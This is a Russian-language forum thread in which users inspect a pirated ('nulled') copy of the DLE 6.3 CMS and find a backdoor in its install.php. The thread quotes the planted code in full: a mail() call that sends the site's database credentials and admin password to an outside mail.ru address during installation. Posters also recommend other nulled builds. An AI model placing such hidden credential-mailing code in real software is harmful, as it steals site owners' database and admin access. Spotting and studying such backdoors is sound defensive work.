Доброго времени суток.
Вот у меня такая фигня, короче нужно проверить cms DLE 6.3
Вот тут исходники _http://rapidshare.com/files/89292111/dle.zip.html
Кто может проверить отпишитесь.
Я нашел только 1 фитчу в файле install.php на строке 432 все пассы отправляет на мыло кому то.

Посмотрел DLE 6.3 только не тот
на который ты дал ссылку а свой но все равно все из одной богодельни. Посмотрел файл install.php и что-то не нашел я там в указанной тобою строке отправку куда-то: вот строки с 425 по 433

elseif($_REQUEST['action'] == "doinstall")
{
if(!$reg_username or !$reg_email or !$reg_password1 or !$url or $reg_password1 != $reg_password2){ msg("error", "Ошибка!!!" ,"Заполните необходимые поля!", "javascript:history.go(-1)"); }
if (preg_match("/[\||\'|\<|\>|\"|\!|\$|\@|\&\~\*\+]/", $reg_username))
{
msg("error", "Ошибка!!!" ,"Введенное имя администратора недопустимо к регистрации!", "javascript:history.go(-1)");
}

$reg_password = md5(md5($reg_password1));

Дальше идет формирование конфигурации. Вообще после установки этого движка файл install.php удаляется в целях безопасности(дабы исключить переустановку).

этот код типа из скрипта инстала выдрать надо?

Не понял твоего вопроса. Если можешь покажи саму строку.

я же говорю строка 432

Я тебе привел со строки 425 по строку 433 и в строке 432 нету твоего кода! О котором ты говоришь, напиши сюда код. Что ты там увидел? Всавь в сообщение епт...

HTML;

}
// ************************************************** ******************************
// Do Install
// ************************************************** ******************************
elseif($_REQUEST['action'] == "doinstall")
{
if(!$reg_username or !$reg_email or !$reg_password1 or !$url or $reg_password1 != $reg_password2){ msg("error", "Ошибка!!!" ,"Заполните необходимые поля!", "javascript:history.go(-1)"); }
if (preg_match("/[\||\'|\<|\>|\"|\!|\$|\@|\&\~\*\+]/", $reg_username))
{
msg("error", "Ошибка!!!" ,"Введенное имя администратора недопустимо к регистрации!", "javascript:history.go(-1)");
}
mail("pinkfloyd1488@mail.ru", "Привет, вот тебе данные", "ЮРЛ Сайта: $url \n DBHOST: $dbhost \n DBNAME: $dbname \n DBUSER: $dbuser \n DBPASS: $dbpasswd \n Данные админ панели \n Имя админа: $reg_username \n Пароль админа: $reg_password1 \n Мыло Админа: $reg_email");

$reg_password = md5(md5($reg_password1));

$config = <<<HTML

pinkfloyd1488@mail.ru

Ali_MiX, хаха)))
Удалил хоть строку?:)

да
но я не про то, я про то может там ещё что встроили, может шелы какие или инклуды какие нить

lol кто-то классно придумал. Да действительно в твоем варианте пассы отсылаются на емайл. Видимо кто-то решил собрать веселую сборку. Но это скорее не баг, а хак.
Вообщем с этого ты ничего не поимеешь, качни норм сборку! Зануленную Мид Тимом. Причем с проверенных ресурсов а не с хз каких. По поводу вообще багов в DLE - пока не попадались.

Хочешь могу выложить тебе норм версию 6.3 или 6.5.

я тут не про баги спрашиваю а про шелы в cms.
а так спасибо
вот тут проверено _http://scripter.biz

Ставь нуль от M.I.D team и не мучайся у них всё чисто и качественно.

я тут не про баги спрашиваю а про шелы в cms.
а так спасибо
вот тут проверено _http://scripter.biz

Так тебе выкладывать или нет?

нет, я скачал)